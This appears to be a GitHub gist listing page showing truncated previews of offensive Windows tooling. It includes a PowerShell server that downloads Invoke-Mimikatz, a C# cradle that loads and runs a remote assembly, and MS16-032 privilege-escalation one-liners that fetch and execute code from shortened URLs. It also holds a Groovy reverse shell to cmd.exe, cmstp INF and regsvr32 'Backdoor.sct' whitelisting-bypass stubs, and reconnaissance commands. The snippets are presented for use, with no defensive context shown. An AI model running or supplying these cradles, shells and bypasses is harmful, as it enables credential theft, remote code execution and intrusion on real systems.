View server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
View DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
View gist:41e1c89a7520ed52398a7a9f33fc3b99
Powershell:
powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/wrlBsL'); Invoke-ms16-032"
C# 64bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X64.exe" /platform:x64 "%temp%\ms16-032.cs" && %temp%\ms16-032_X64.exe
C# 32bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X32.exe" /platform:x32 "%te
View getTGT.py
#!/usr/bin/env python
# Copyright (c) 2016-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
View test.inf
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
View test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
View Commands.txt
Author: Casey Smith @subTee
ipconfig /all>> C:\Tools\Debug\1.txt
tasklist /v >> C:\Tools\Debug\1.txt
net user >>C:\Tools\Debug\1.txt
net localgroup administrators>>C:\Tools\Debug\1.txt
netstat -ano >> C:\Tools\Debug\1.txt
net use >> C:\Tools\Debug\1.txt
net view >> C:\Tools\Debug\1.txt
net view /domain >> C:\Tools\Debug\1.txt
View Backdoor.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->